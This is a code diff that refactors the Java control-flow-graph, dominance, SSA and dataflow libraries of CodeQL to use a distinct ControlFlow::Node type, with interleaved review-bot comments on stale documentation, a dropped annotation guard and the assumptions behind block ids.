@@ -1463,7 +1548,7 @@ private module ControlFlowGraphImpl { * predicate `finallyPred`, since their completion is resumed after normal * completion of the `finally`. */ - private Completion resumption(ControlFlowNode n) { + private Completion resumption(Node n) { exists(TryStmt try | lastInFinally(try, n) and finallyPred(try, _, result)) or not lastInFinally(_, n) and result = NormalCompletion() @@ -1474,9 +1559,7 @@ private module ControlFlowGraphImpl { * * That is, the `booleanCompletion` is the label of the edge in the CFG. */ - private ControlFlowNode mainBranchSucc(ControlFlowNode n, boolean b) { - result = succ(n, BooleanCompletion(_, b)) - } + private Node mainBranchSucc(Node n, boolean b) { result = succ(n, BooleanCompletion(_, b)) } /** * A true- or false-successor that is not tagged with a `booleanCompletion`. @@ -1487,8 +1570,8 @@ private module ControlFlowGraphImpl { * In the latter case, when `n` occurs as the last node in a finally block, there might be * multiple different such successors. */ - private ControlFlowNode otherBranchSucc(ControlFlowNode n, boolean b) { - exists(ControlFlowNode main | main = mainBranchSucc(n, b.booleanNot()) | + private Node otherBranchSucc(Node n, boolean b) { + exists(Node main | main = mainBranchSucc(n, b.booleanNot()) | result = succ(n, resumption(n)) and not result = main and (b = true or b = false) @@ -1497,7 +1580,7 @@ private module ControlFlowGraphImpl { /** Gets a true- or false-successor of `n`. */ cached - ControlFlowNode branchSuccessor(ControlFlowNode n, boolean branch) { + Node branchSuccessor(Node n, boolean branch) { result = mainBranchSucc(n, branch) or result = otherBranchSucc(n, branch) } 
@@ -1506,18 +1589,18 @@ private module ControlFlowGraphImpl { private import ControlFlowGraphImpl /** A control-flow node that branches based on a condition. */ -class ConditionNode extends ControlFlowNode { +class ConditionNode extends ControlFlow::Node { ConditionNode() { exists(branchSuccessor(this, _)) } /** Gets a true- or false-successor of the `ConditionNode`. */ - ControlFlowNode getABranchSuccessor(boolean branch) { result = branchSuccessor(this, branch) } + ControlFlow::Node getABranchSuccessor(boolean branch) { result = branchSuccessor(this, branch) } /** Gets a true-successor of the `ConditionNode`. */ - ControlFlowNode getATrueSuccessor() { result = this.getABranchSuccessor(true) } + ControlFlow::Node getATrueSuccessor() { result = this.getABranchSuccessor(true) } /** Gets a false-successor of the `ConditionNode`. */ - ControlFlowNode getAFalseSuccessor() { result = this.getABranchSuccessor(false) } + ControlFlow::Node getAFalseSuccessor() { result = this.getABranchSuccessor(false) } /** Gets the condition of this `ConditionNode`. This is equal to the node itself. */ - ExprParent getCondition() { result = this } + ExprParent getCondition() { result = this.asExpr() or result = this.asStmt() } } diff --git a/java/ql/lib/semmle/code/java/Expr.qll b/java/ql/lib/semmle/code/java/Expr.qll index 1862319e30b..24e5a6e24d8 100644 --- a/java/ql/lib/semmle/code/java/Expr.qll +++ b/java/ql/lib/semmle/code/java/Expr.qll 
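Review bot: The QLDoc on `ConditionNode.getCondition()` still reads "This is equal to the node itself", but the new body returns `this.asExpr()` or `this.asStmt()`, which is the underlying AST element and not the `ControlFlow::Node`. Callers that compared the result with the node will silently stop matching, so the comment should say what is returned, for example `/** Gets the expression or statement underlying this `ConditionNode`. */`.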
@@ -61,10 +61,10 @@ class Expr extends ExprParent, @expr { Expr getAChildExpr() { exprs(result, _, _, this, _) } /** Gets the basic block in which this expression occurs, if any. */ - BasicBlock getBasicBlock() { result.getANode() = this } + BasicBlock getBasicBlock() { result.getANode().asExpr() = this } /** Gets the `ControlFlowNode` corresponding to this expression. */ - ControlFlowNode getControlFlowNode() { result = this } + ControlFlowNode getControlFlowNode() { result.asExpr() = this } /** This statement's Halstead ID (used to compute Halstead metrics). */ string getHalsteadID() { result = this.toString() } diff --git a/java/ql/lib/semmle/code/java/Statement.qll b/java/ql/lib/semmle/code/java/Statement.qll index f4eafd39e9f..da9621f9ce3 100644 --- a/java/ql/lib/semmle/code/java/Statement.qll +++ b/java/ql/lib/semmle/code/java/Statement.qll @@ -45,10 +45,10 @@ class Stmt extends StmtParent, ExprParent, @stmt { Stmt getAChild() { result.getParent() = this } /** Gets the basic block in which this statement occurs. */ - BasicBlock getBasicBlock() { result.getANode() = this } + BasicBlock getBasicBlock() { result.getANode().asStmt() = this } /** Gets the `ControlFlowNode` corresponding to this statement. */ - ControlFlowNode getControlFlowNode() { result = this } + ControlFlowNode getControlFlowNode() { result.asStmt() = this } /** Cast this statement to a class that provides access to metrics information. */ MetricStmt getMetrics() { result = this } diff --git a/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll b/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll index 3fae0f0b4d2..972f97ba367 100644 --- a/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll +++ b/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll 
@@ -66,3 +66,8 @@ class BasicBlock extends ControlFlowNode { /** Holds if this basic block post-dominates `node`. (This is reflexive.) */ predicate bbPostDominates(BasicBlock node) { bbPostDominates(this, node) } } + +/** A basic block that ends in an exit node. */ +class ExitBlock extends BasicBlock { + ExitBlock() { this.getLastNode() instanceof ControlFlow::ExitNode } +} diff --git a/java/ql/lib/semmle/code/java/controlflow/Dominance.qll b/java/ql/lib/semmle/code/java/controlflow/Dominance.qll index a1263ce3f0e..953bfa12e64 100644 --- a/java/ql/lib/semmle/code/java/controlflow/Dominance.qll +++ b/java/ql/lib/semmle/code/java/controlflow/Dominance.qll @@ -9,13 +9,15 @@ import java */ /** Entry points for control-flow. */ -private predicate flowEntry(Stmt entry) { - exists(Callable c | entry = c.getBody()) - or - // This disjunct is technically superfluous, but safeguards against extractor problems. - entry instanceof BlockStmt and - not exists(entry.getEnclosingCallable()) and - not entry.getParent() instanceof Stmt +private predicate flowEntry(BasicBlock entry) { + exists(Stmt entrystmt | entrystmt = entry.getFirstNode().asStmt() | + exists(Callable c | entrystmt = c.getBody()) + or + // This disjunct is technically superfluous, but safeguards against extractor problems. + entrystmt instanceof BlockStmt and + not exists(entry.getEnclosingCallable()) and + not entrystmt.getParent() instanceof Stmt + ) } /** The successor relation for basic blocks. */ 
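Review bot: In `flowEntry` the safeguard disjunct mixes two views of the entry: `entrystmt instanceof BlockStmt` and `not entrystmt.getParent() instanceof Stmt` test the statement, while `not exists(entry.getEnclosingCallable())` is asked of the `BasicBlock`. Whether that matches the old statement-level check depends on how `ControlFlow::Node` resolves its enclosing callable, which is defined outside this hunk. Writing `not exists(entrystmt.getEnclosingCallable()) and` keeps the pre-change meaning explicit. The QLDoc could also be updated to `/** Holds if `entry` is the basic block at which control flow enters a callable. */`, since the parameter is no longer a `Stmt`.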
@@ -31,11 +33,8 @@ predicate hasDominanceInformation(BasicBlock bb) { exists(BasicBlock entry | flowEntry(entry) and bbSucc*(entry, bb)) } -/** Exit points for control-flow. */ -private predicate flowExit(Callable exit) { exists(ControlFlowNode s | s.getASuccessor() = exit) } - /** Exit points for basic-block control-flow. */ -private predicate bbSink(BasicBlock exit) { flowExit(exit.getLastNode()) } +private predicate bbSink(BasicBlock exit) { exit.getLastNode() instanceof ControlFlow::ExitNode } /** Reversed `bbSucc`. */ private predicate bbPred(BasicBlock post, BasicBlock pre) { post = pre.getABBSuccessor() } diff --git a/java/ql/lib/semmle/code/java/controlflow/Guards.qll b/java/ql/lib/semmle/code/java/controlflow/Guards.qll index 0d0ecd5b2ea..ff564b3a446 100644 --- a/java/ql/lib/semmle/code/java/controlflow/Guards.qll +++ b/java/ql/lib/semmle/code/java/controlflow/Guards.qll @@ -113,7 +113,7 @@ private PatternCase getClosestPrecedingPatternCase(SwitchCase case) { private predicate isNonFallThroughPredecessor(SwitchCase sc, ControlFlowNode pred) { pred = sc.getControlFlowNode().getAPredecessor() and ( - pred.(Expr).getParent*() = sc.getSelectorExpr() + pred.asExpr().getParent*() = sc.getSelectorExpr() or // Ambiguous: in the case of `case String _ when x: case "SomeConstant":`, the guard `x` // passing edge will fall through into the constant case, and the guard failing edge @@ -122,7 +122,7 @@ private predicate isNonFallThroughPredecessor(SwitchCase sc, ControlFlowNode pre exists(PatternCase previousPatternCase | previousPatternCase = getClosestPrecedingPatternCase(sc) | - pred.(Expr).getParent*() = previousPatternCase.getGuard() and + pred.asExpr().getParent*() = previousPatternCase.getGuard() and // Check there is any statement in between the previous pattern case and this one, // or the case is a rule, so there is no chance of a fall-through. ( 
@@ -133,7 +133,7 @@ private predicate isNonFallThroughPredecessor(SwitchCase sc, ControlFlowNode pre or // Unambigious: on the test-passing edge there must be at least one intervening // declaration node, including anonymous `_` declarations. - pred = getClosestPrecedingPatternCase(sc) + pred.asStmt() = getClosestPrecedingPatternCase(sc) ) } diff --git a/java/ql/lib/semmle/code/java/controlflow/Paths.qll b/java/ql/lib/semmle/code/java/controlflow/Paths.qll index b4e9a68b280..5a06a3a1ee5 100644 --- a/java/ql/lib/semmle/code/java/controlflow/Paths.qll +++ b/java/ql/lib/semmle/code/java/controlflow/Paths.qll @@ -32,7 +32,7 @@ abstract class ActionConfiguration extends string { private BasicBlock actionBlock(ActionConfiguration conf) { exists(ControlFlowNode node | result = node.getBasicBlock() | conf.isAction(node) or - callAlwaysPerformsAction(node, conf) + callAlwaysPerformsAction(node.asCall(), conf) ) } @@ -45,17 +45,17 @@ private predicate callAlwaysPerformsAction(Call call, ActionConfiguration conf) /** Holds if an action dominates the exit of the callable. */ private predicate actionDominatesExit(Callable callable, ActionConfiguration conf) { - exists(BasicBlock exit | - exit.getLastNode() = callable and + exists(ExitBlock exit | + exit.getEnclosingCallable() = callable and actionBlock(conf).bbDominates(exit) ) } /** Gets a `BasicBlock` that contains an action that does not dominate the exit. */ private BasicBlock nonDominatingActionBlock(ActionConfiguration conf) { - exists(BasicBlock exit | + exists(ExitBlock exit | result = actionBlock(conf) and - exit.getLastNode() = result.getEnclosingCallable() and + exit.getEnclosingCallable() = result.getEnclosingCallable() and not result.bbDominates(exit) ) } 
@@ -80,8 +80,8 @@ private predicate postActionBlock(BasicBlock bb, ActionConfiguration conf) { private predicate callableAlwaysPerformsAction(Callable callable, ActionConfiguration conf) { actionDominatesExit(callable, conf) or - exists(BasicBlock exit | - exit.getLastNode() = callable and + exists(ExitBlock exit | + exit.getEnclosingCallable() = callable and postActionBlock(exit, conf) ) } diff --git a/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll b/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll index f34ace10d31..7bcc732de6a 100644 --- a/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll +++ b/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll @@ -207,14 +207,12 @@ class UnreachableBasicBlock extends BasicBlock { conditionBlock.controls(this, constant.booleanNot()) ) or - // This block is not reachable in the CFG, and is not a callable, a body of a callable, an - // expression in an annotation, an expression in an assert statement, or a catch clause. + // This block is not reachable in the CFG, and is not the entrypoint in a callable, an + // expression in an assert statement, or a catch clause. forall(BasicBlock bb | bb = this.getABBPredecessor() | bb instanceof UnreachableBasicBlock) and - not exists(Callable c | c.getBody() = this) and - not this instanceof Callable and - not exists(Annotation a | a.getAChildExpr*() = this) and - not this.(Expr).getEnclosingStmt() instanceof AssertStmt and - not this instanceof CatchClause + not exists(Callable c | c.getBody().getControlFlowNode() = this.getFirstNode()) and + not this.getFirstNode().asExpr().getEnclosingStmt() instanceof AssertStmt and + not this.getFirstNode().asStmt() instanceof CatchClause or // Switch statements with a constant comparison expression may have unreachable cases. exists(ConstSwitchStmt constSwitchStmt, BasicBlock unreachableCaseBlock | 
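Review bot: The last disjunct of `UnreachableBasicBlock` (hunk `@@ -207,14 +207,12 @@`) drops `not exists(Annotation a | a.getAChildExpr*() = this)` with no replacement, and the rewritten comment no longer mentions annotations. If expressions inside annotations still receive a `ControlFlow::Node` (not visible here), each one is a block with no predecessors and would now be classified as unreachable, which could change results for anything that filters on this class. Either confirm that such expressions are no longer part of the CFG, or keep the guard in the new form, `not exists(Annotation a | a.getAChildExpr*() = this.getFirstNode().asExpr()) and`. The class body starts and ends outside the hunk.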
diff --git a/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll b/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll index 18bdb879c3c..0bae1b5e9c1 100644 --- a/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll +++ b/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll @@ -227,12 +227,14 @@ class InstanceAccessExt extends TInstanceAccessExt { /** Gets the control flow node associated with this instance access. */ ControlFlowNode getCfgNode() { exists(ExprParent e | e = this.getAssociatedExprOrStmt() | - e instanceof Call and result = e + result.asCall() = e or - e instanceof InstanceAccess and result = e + e.(InstanceAccess).getControlFlowNode() = result or exists(FieldAccess fa | fa = e | - if fa instanceof VarRead then fa = result else result.(AssignExpr).getDest() = fa + if fa instanceof VarRead + then fa.getControlFlowNode() = result + else result.asExpr().(AssignExpr).getDest() = fa ) ) } diff --git a/java/ql/lib/semmle/code/java/dataflow/Nullness.qll b/java/ql/lib/semmle/code/java/dataflow/Nullness.qll index fb2fc668cf3..618716629b1 100644 --- a/java/ql/lib/semmle/code/java/dataflow/Nullness.qll +++ b/java/ql/lib/semmle/code/java/dataflow/Nullness.qll @@ -130,8 +130,8 @@ predicate dereference(Expr e) { * The `VarAccess` is included for nicer error reporting. */ private ControlFlowNode varDereference(SsaVariable v, VarAccess va) { - dereference(result) and - result = sameValue(v, va) + dereference(result.asExpr()) and + result.asExpr() = sameValue(v, va) } /** 
@@ -141,16 +141,16 @@ private ControlFlowNode varDereference(SsaVariable v, VarAccess va) { private ControlFlowNode ensureNotNull(SsaVariable v) { result = varDereference(v, _) or - result.(AssertStmt).getExpr() = nullGuard(v, true, false) + result.asStmt().(AssertStmt).getExpr() = nullGuard(v, true, false) or - exists(AssertTrueMethod m | result = m.getACheck(nullGuard(v, true, false))) + exists(AssertTrueMethod m | result.asCall() = m.getACheck(nullGuard(v, true, false))) or - exists(AssertFalseMethod m | result = m.getACheck(nullGuard(v, false, false))) + exists(AssertFalseMethod m | result.asCall() = m.getACheck(nullGuard(v, false, false))) or - exists(AssertNotNullMethod m | result = m.getACheck(v.getAUse())) + exists(AssertNotNullMethod m | result.asCall() = m.getACheck(v.getAUse())) or exists(AssertThatMethod m, MethodCall ma | - result = m.getACheck(v.getAUse()) and ma.getControlFlowNode() = result + result.asCall() = m.getACheck(v.getAUse()) and ma.getControlFlowNode() = result | ma.getAnArgument().(MethodCall).getMethod().getName() = "notNullValue" ) @@ -279,10 +279,10 @@ private predicate enhancedForEarlyExit(EnhancedForStmt for, ControlFlowNode n1, exists(Expr forExpr | n1.getANormalSuccessor() = n2 and for.getExpr() = forExpr and - forExpr.getAChildExpr*() = n1 and - not forExpr.getAChildExpr*() = n2 and - n1.getANormalSuccessor() = for.getVariable() and - not n2 = for.getVariable() + forExpr.getAChildExpr*() = n1.asExpr() and + not forExpr.getAChildExpr*() = n2.asExpr() and + n1.getANormalSuccessor().asExpr() = for.getVariable() and + not n2.asExpr() = for.getVariable() ) } 
@@ -343,7 +343,7 @@ private predicate nullVarStep( not impossibleEdge(mid, bb) and not exists(boolean branch | nullGuard(midssa, branch, false).hasBranchEdge(mid, bb, branch)) and not (leavingFinally(mid, bb, true) and midstoredcompletion = true) and - if bb.getFirstNode() = any(TryStmt try | | try.getFinally()) + if bb.getFirstNode().asStmt() = any(TryStmt try | | try.getFinally()) then if bb.getFirstNode() = mid.getLastNode().getANormalSuccessor() then storedcompletion = false diff --git a/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll b/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll index e0055d53f08..c950963b104 100644 --- a/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll +++ b/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll @@ -211,9 +211,11 @@ module Sem implements Semantic { BasicBlock getABasicBlockSuccessor(BasicBlock bb) { result = bb.getABBSuccessor() } - private predicate id(BasicBlock x, BasicBlock y) { x = y } + private predicate id(ExprParent x, ExprParent y) { x = y } - private predicate idOf(BasicBlock x, int y) = equivalenceRelation(id/2)(x, y) + private predicate idOfAst(ExprParent x, int y) = equivalenceRelation(id/2)(x, y) + + private predicate idOf(BasicBlock x, int y) { idOfAst(x.getAstNode(), y) } int getBlockId1(BasicBlock bb) { idOf(bb, result) } diff --git a/java/ql/lib/semmle/code/java/dataflow/SSA.qll b/java/ql/lib/semmle/code/java/dataflow/SSA.qll index 0fc0da8e871..ce58e7d58dc 100644 --- a/java/ql/lib/semmle/code/java/dataflow/SSA.qll +++ b/java/ql/lib/semmle/code/java/dataflow/SSA.qll @@ -228,7 +228,7 @@ private module SsaImpl { /** Holds if `n` must update the locally tracked variable `v`. */ cached predicate certainVariableUpdate(TrackedVar v, ControlFlowNode n, BasicBlock b, int i) { - exists(VariableUpdate a | a = n | getDestVar(a) = v) and + exists(VariableUpdate a | a.getControlFlowNode() = n | getDestVar(a) = v) and b.getNode(i) = n and hasDominanceInformation(b) or 
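Review bot: The new `idOf` in RangeAnalysis.qll numbers a basic block by the id of `x.getAstNode()`, and no comment states what that relies on. Block ids stay unique and total only if every basic block has exactly one AST node and no two blocks share one. `getAstNode()` is declared outside this hunk, so that cannot be checked here, and with the `Exit` nodes that show up in the updated test output it is no longer obvious. I would add above it `// Ids are taken from the block's AST node; assumes every block has exactly one and no two blocks share it.` The identical rewrite of `idOf` in SsaReadPositionSpecific.qll needs the same comment.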
@@ -237,8 +237,8 @@ private module SsaImpl { /** Gets the definition point of a nested class in the parent scope. */ private ControlFlowNode parentDef(NestedClass nc) { - nc.(AnonymousClass).getClassInstanceExpr() = result or - nc.(LocalClass).getLocalTypeDeclStmt() = result + nc.(AnonymousClass).getClassInstanceExpr().getControlFlowNode() = result or + nc.(LocalClass).getLocalTypeDeclStmt().getControlFlowNode() = result } /** @@ -276,7 +276,7 @@ private module SsaImpl { /** Holds if `VarAccess` `use` of `v` occurs in `b` at index `i`. */ private predicate variableUse(TrackedVar v, VarRead use, BasicBlock b, int i) { - v.getAnAccess() = use and b.getNode(i) = use + v.getAnAccess() = use and b.getNode(i) = use.getControlFlowNode() } /** Holds if the value of `v` is captured in `b` at index `i`. */ @@ -423,7 +423,7 @@ private module SsaImpl { * `f` has an update somewhere. */ private predicate updateCandidate(TrackedField f, Call call, BasicBlock b, int i) { - b.getNode(i) = call and + b.getNode(i).asCall() = call and call.getEnclosingCallable() = f.getEnclosingCallable() and relevantFieldUpdate(_, f.getField(), _) } @@ -550,7 +550,7 @@ private module SsaImpl { /** Holds if `n` might update the locally tracked variable `v`. */ cached predicate uncertainVariableUpdate(TrackedVar v, ControlFlowNode n, BasicBlock b, int i) { - exists(Call c | c = n | updatesNamedField(c, v, _)) and + exists(Call c | c = n.asCall() | updatesNamedField(c, v, _)) and b.getNode(i) = n and hasDominanceInformation(b) or 
@@ -574,12 +574,16 @@ private module SsaImpl { /** Holds if `v` has an implicit definition at the entry, `b`, of the callable. */ cached predicate hasEntryDef(TrackedVar v, BasicBlock b) { - exists(LocalScopeVariable l, Callable c | v = TLocalVar(c, l) and c.getBody() = b | + exists(LocalScopeVariable l, Callable c | + v = TLocalVar(c, l) and c.getBody().getControlFlowNode() = b + | l instanceof Parameter or l.getCallable() != c ) or - v instanceof SsaSourceField and v.getEnclosingCallable().getBody() = b and liveAtEntry(v, b) + v instanceof SsaSourceField and + v.getEnclosingCallable().getBody().getControlFlowNode() = b and + liveAtEntry(v, b) } /** @@ -882,7 +886,7 @@ private newtype TSsaVariable = } or TSsaEntryDef(TrackedVar v, BasicBlock b) { hasEntryDef(v, b) } or TSsaUntracked(SsaSourceField nf, ControlFlowNode n) { - n = nf.getAnAccess().(FieldRead) and not trackField(nf) + n = nf.getAnAccess().(FieldRead).getControlFlowNode() and not trackField(nf) } /** @@ -940,7 +944,7 @@ class SsaVariable extends TSsaVariable { /** Gets an access of this SSA variable. */ VarRead getAUse() { ssaDefReachesUse(_, this, result) or - this = TSsaUntracked(_, result) + this = TSsaUntracked(_, result.getControlFlowNode()) } /** @@ -954,7 +958,7 @@ class SsaVariable extends TSsaVariable { */ VarRead getAFirstUse() { firstUse(this, result) or - this = TSsaUntracked(_, result) + this = TSsaUntracked(_, result.getControlFlowNode()) } /** Holds if this SSA variable is live at the end of `b`. */ @@ -990,7 +994,7 @@ class SsaUpdate extends SsaVariable { class SsaExplicitUpdate extends SsaUpdate, TSsaCertainUpdate { SsaExplicitUpdate() { exists(VariableUpdate upd | - upd = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() + upd.getControlFlowNode() = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() ) } 
@@ -998,7 +1002,8 @@ class SsaExplicitUpdate extends SsaUpdate, TSsaCertainUpdate { /** Gets the `VariableUpdate` defining the SSA variable. */ VariableUpdate getDefiningExpr() { - result = this.getCfgNode() and getDestVar(result) = this.getSourceVariable() + result.getControlFlowNode() = this.getCfgNode() and + getDestVar(result) = this.getSourceVariable() } } @@ -1038,7 +1043,7 @@ class SsaImplicitUpdate extends SsaUpdate { exists(SsaSourceField f, Callable setter | f = this.getSourceVariable() and relevantFieldUpdate(setter, f.getField(), result) and - updatesNamedField(this.getCfgNode(), f, setter) + updatesNamedField(this.getCfgNode().asCall(), f, setter) ) } @@ -1086,7 +1091,7 @@ class SsaImplicitInit extends SsaVariable, TSsaEntryDef { */ predicate isParameterDefinition(Parameter p) { this.getSourceVariable() = TLocalVar(p.getCallable(), p) and - p.getCallable().getBody() = this.getCfgNode() + p.getCallable().getBody().getControlFlowNode() = this.getCfgNode() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll b/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll index 9e05b69db4a..d29cc1ae542 100644 --- a/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll +++ b/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll @@ -252,8 +252,8 @@ private module Input implements TypeFlowInput { downcastSuccessorAux(pragma[only_bind_into](cast), v, t, t1, t2) and t1.getASourceSupertype+() = t2 and va = v.getAUse() and - dominates(cast, va) and - dominates(cast.(ControlFlowNode).getANormalSuccessor(), va) + dominates(cast.getControlFlowNode(), va.getControlFlowNode()) and + dominates(cast.getControlFlowNode().getANormalSuccessor(), va.getControlFlowNode()) ) } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll b/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll index 79f12e57f6a..073d87d9744 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll 
@@ -73,15 +73,15 @@ private module SsaImpl { /** Holds if `n` updates the local variable `v`. */ cached predicate variableUpdate(BaseSsaSourceVariable v, ControlFlowNode n, BasicBlock b, int i) { - exists(VariableUpdate a | a = n | getDestVar(a) = v) and + exists(VariableUpdate a | a.getControlFlowNode() = n | getDestVar(a) = v) and b.getNode(i) = n and hasDominanceInformation(b) } /** Gets the definition point of a nested class in the parent scope. */ private ControlFlowNode parentDef(NestedClass nc) { - nc.(AnonymousClass).getClassInstanceExpr() = result or - nc.(LocalClass).getLocalTypeDeclStmt() = result + nc.(AnonymousClass).getClassInstanceExpr().getControlFlowNode() = result or + nc.(LocalClass).getLocalTypeDeclStmt().getControlFlowNode() = result } /** @@ -121,7 +121,7 @@ private module SsaImpl { /** Holds if `VarAccess` `use` of `v` occurs in `b` at index `i`. */ private predicate variableUse(BaseSsaSourceVariable v, VarRead use, BasicBlock b, int i) { - v.getAnAccess() = use and b.getNode(i) = use + v.getAnAccess() = use and b.getNode(i) = use.getControlFlowNode() } /** Holds if the value of `v` is captured in `b` at index `i`. */ @@ -164,7 +164,9 @@ private module SsaImpl { /** Holds if `v` has an implicit definition at the entry, `b`, of the callable. */ cached predicate hasEntryDef(BaseSsaSourceVariable v, BasicBlock b) { - exists(LocalScopeVariable l, Callable c | v = TLocalVar(c, l) and c.getBody() = b | + exists(LocalScopeVariable l, Callable c | + v = TLocalVar(c, l) and c.getBody().getControlFlowNode() = b + | l instanceof Parameter or l.getCallable() != c ) @@ -537,7 +539,7 @@ class BaseSsaVariable extends TBaseSsaVariable { class BaseSsaUpdate extends BaseSsaVariable, TSsaUpdate { BaseSsaUpdate() { exists(VariableUpdate upd | - upd = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() + upd.getControlFlowNode() = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() ) } 
@@ -545,7 +547,8 @@ class BaseSsaUpdate extends BaseSsaVariable, TSsaUpdate { /** Gets the `VariableUpdate` defining the SSA variable. */ VariableUpdate getDefiningExpr() { - result = this.getCfgNode() and getDestVar(result) = this.getSourceVariable() + result.getControlFlowNode() = this.getCfgNode() and + getDestVar(result) = this.getSourceVariable() } } @@ -566,7 +569,7 @@ class BaseSsaImplicitInit extends BaseSsaVariable, TSsaEntryDef { */ predicate isParameterDefinition(Parameter p) { this.getSourceVariable() = TLocalVar(p.getCallable(), p) and - p.getCallable().getBody() = this.getCfgNode() + p.getCallable().getBody().getControlFlowNode() = this.getCfgNode() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll index 589d75c3635..704e5714784 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll @@ -112,7 +112,7 @@ private module CaptureInput implements VariableCapture::InputSig { Location getLocation() { result = super.getLocation() } - predicate hasCfgNode(BasicBlock bb, int i) { this = bb.(J::BasicBlock).getNode(i) } + predicate hasCfgNode(BasicBlock bb, int i) { this = bb.(J::BasicBlock).getNode(i).asExpr() } } class VariableWrite extends Expr instanceof VariableUpdate { diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll index bb71ed25c73..c66af2c78c5 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll 
@@ -17,9 +17,11 @@ import DataFlowNodes::Public /** Holds if `n` is an access to an unqualified `this` at `cfgnode`. */ private predicate thisAccess(Node n, ControlFlowNode cfgnode) { - n.(InstanceParameterNode).getCallable().getBody() = cfgnode + n.(InstanceParameterNode).getCallable().getBody() = cfgnode.asStmt() or - exists(InstanceAccess ia | ia = n.asExpr() and ia = cfgnode and ia.isOwnInstanceAccess()) + exists(InstanceAccess ia | + ia = n.asExpr() and ia.getControlFlowNode() = cfgnode and ia.isOwnInstanceAccess() + ) or n.(ImplicitInstanceAccess).getInstanceAccess().(OwnInstanceAccess).getCfgNode() = cfgnode } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll index 35384874b0d..c88b9946faa 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll @@ -133,5 +133,5 @@ module Private { predicate ssaUpdateStep = RU::ssaUpdateStep/3; - Expr getABasicBlockExpr(BasicBlock bb) { result = bb.getANode() } + Expr getABasicBlockExpr(BasicBlock bb) { result = bb.getANode().asExpr() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll index bcc11e26518..ee2e3bb2412 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll 
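Review bot: The first disjunct of `thisAccess` in DataFlowUtil.qll converts from the CFG node to the AST with `getBody() = cfgnode.asStmt()`, while the disjunct right below it and the body comparisons in SSA.qll and BaseSSA.qll (`hasEntryDef`, `isParameterDefinition`) go the other way with `getControlFlowNode()`. Using one direction throughout makes the conversion easier to audit: `n.(InstanceParameterNode).getCallable().getBody().getControlFlowNode() = cfgnode`. The two forms look equivalent from here, but that depends on `asStmt()` and `getControlFlowNode()` being inverses, which is defined outside this hunk.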
@@ -340,7 +340,7 @@ private module Impl { Field getField(FieldAccess fa) { result = fa.getField() } - Expr getAnExpression(SsaReadPositionBlock bb) { result = bb.getBlock().getANode() } + Expr getAnExpression(SsaReadPositionBlock bb) { result = bb.getBlock().getANode().asExpr() } Guard getComparisonGuard(ComparisonExpr ce) { result = ce } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll index 410dc6b5cfe..8712ad635f5 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll @@ -15,9 +15,11 @@ class BasicBlock = BB::BasicBlock; /** Gets a basic block in which SSA variable `v` is read. */ BasicBlock getAReadBasicBlock(SsaVariable v) { result = v.getAUse().getBasicBlock() } -private predicate id(BasicBlock x, BasicBlock y) { x = y } +private predicate id(BB::ExprParent x, BB::ExprParent y) { x = y } -private predicate idOf(BasicBlock x, int y) = equivalenceRelation(id/2)(x, y) +private predicate idOfAst(BB::ExprParent x, int y) = equivalenceRelation(id/2)(x, y) + +private predicate idOf(BasicBlock x, int y) { idOfAst(x.getAstNode(), y) } private int getId(BasicBlock bb) { 